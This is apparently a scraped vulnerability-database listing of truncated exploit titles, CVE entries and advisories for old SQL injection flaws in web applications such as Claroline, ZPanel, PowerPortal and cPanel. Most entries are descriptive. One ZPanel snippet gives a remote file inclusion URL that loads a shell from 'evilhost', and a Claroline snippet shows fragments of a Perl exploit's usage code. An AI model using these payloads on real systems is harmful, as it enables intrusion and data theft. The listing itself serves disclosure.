Claroline e-Learning <= 1.6 Remote Hash SQL Injection Exploit (2)

Exploit for unknown platform in category web applications ================================================================= Claroline e-Learning \n"; print STDERR "Targets:\n1 - userInfo.php\n"; print STDERR "2 - exercisesdetails.php\n"; exit; if @ARGV 3 Usage; if @ARGV == 3 $host = @ARGV0; $path...

CVE-2005-1570

forum.asp in bttlxeForum 2.0 allows remote attackers to obtain full path information via a certain hex-encoded argument to the page parameter, possibly due to a SQL injection vulnerability...

PT-2005-2552 · Asp · Asp Virtual News Manager

Name of the Vulnerable Software and Affected Versions: ASP Virtual News Manager affected versions not specified Description: The issue allows remote attackers to execute arbitrary SQL commands via the password parameter in the admin login.asp file. This can be exploited by sending malicious input...

ZPanel &lt;= 2.5 Remote SQL Injection Exploit

No description provided by source. Tested and working /str0ke It is possible to include arbitrary file: local - in version ZPanel = 2.5 beta 10, remote - in ZPanel 2.0. exploit for v 2.0 http://localhost/zpanel/zpanel.php?page=http://evilhost/shell where http://evilhost/shell.php - evil php code...

ZPanel <= 2.5 Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ========================================== ZPanel = 2.5 Remote SQL Injection Exploit ========================================== Tested and working /str0ke It is possible to include arbitrary file: local - in version ZPanel = 2.5 beta 10,...

[Full-Disclosure] Kernelpanik Labs Digest 2005-2

Hi, This is a email digest with security fails recently published by Kernelpanik Labs http://www.kernelpanik.org. paNews 2.0.4b ------------- Remote SQL injection and command execution. Spanish: http://www.kernelpanik.org/docs/kernelpanik/panews.txt cuteNews 1.3.6 -------------- Remote XSS and...

CVE-2004-1515

SQL injection vulnerability in 1 ttlast.php and 2 last10.php in vBulletin 3.0.x allows remote attackers to execute arbitrary SQL statements via the fsel parameter, as demonstrated using last.php...

CVE-2004-2062

SQL injection vulnerability in antiboard.php in AntiBoard 0.7.2 and earlier allows remote attackers to execute arbitrary SQL via the 1 threadid, 2 parentid, or 3 mode parameters...

PowerPortal 1.3 - SQL Injection

source: https://www.securityfocus.com/bid/11681/info PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. PowerPortal 1.3 is reported prone to this vulnerabilit...

PowerPortal 1.3 - SQL Injection

PowerPortal 1.3 - SQL Injection source: https://www.securityfocus.com/bid/11681/info PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. PowerPortal 1.3 is...

Phorum 5.0.x - &#039;FOLLOW.php&#039; SQL Injection

source: https://www.securityfocus.com/bid/11660/info Reportedly Phorum is affected by a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitized user supplied URI input. This issue allows remote attackers to manipulate query logic, leading to...

PT-2004-2553 · Unknown · Password Protect

Name of the Vulnerable Software and Affected Versions: Password Protect affected versions not specified Description: The issue allows remote attackers to execute arbitrary SQL statements and bypass authentication. This can be achieved through various parameters and files, including 1 admin or Pas...

Comersus Cart 5.0 - SQL Injection

Comersus Cart 5.0 - SQL Injection source: https://www.securityfocus.com/bid/10824/info Comersus Cart is reportedly affected by a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL...

Jaws 0.20.30.4 - ControlPanel.php SQL Injection

Jaws 0.20.30.4 - ControlPanel.php SQL Injection source: https://www.securityfocus.com/bid/10826/info JAWS is reportedly affected by a remote SQL injection vulnerability. This issue occurs in the controlpanel.php script due to a failure of the application to properly sanitize user-supplied URI...

CVE-2004-0543

Multiple SQL injection vulnerabilities in Oracle Applications 11.0 and Oracle E-Business Suite 11.5.1 through 11.5.8 allow remote attackers to execute arbitrary SQL procedures and queries...

cPanel 5-9 - Passwd SQL Injection

source: https://www.securityfocus.com/bid/10505/info cPanel is reportedly affected by a remote SQL injection vulnerability in the passwd script. This issue is due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query. The problem...

PHP-Nuke MS-Analysis Module - HTTP Referrer Field SQL Injection

source: https://www.securityfocus.com/bid/9948/info Reportedly the MS-Analysis module is prone to a remote SQL injection vulnerability. This issue is due to a failure to properly sanitize user supplied HTTP header input before using it in an SQL query. As a result of this, a malicious user may...

PHPGedView 2.5/2.6 - &#039;Placelist.php&#039; SQL Injection

source: https://www.securityfocus.com/bid/11910/info It is reported that PhpGedView is susceptible to a remote SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to including it in an SQL query. This issue allows remote...

CVE-2003-0735

SQL injection vulnerability in the Calendar module of phpWebSite 0.9.x and earlier allows remote attackers to execute arbitrary SQL queries, as demonstrated using the year parameter...

CVE-2001-1089

libnss-pgsql in nss-pgsql 0.9.0 and earlier allows remote attackers to execute arbitrary SQL queries by inserting SQL code into an HTTP request...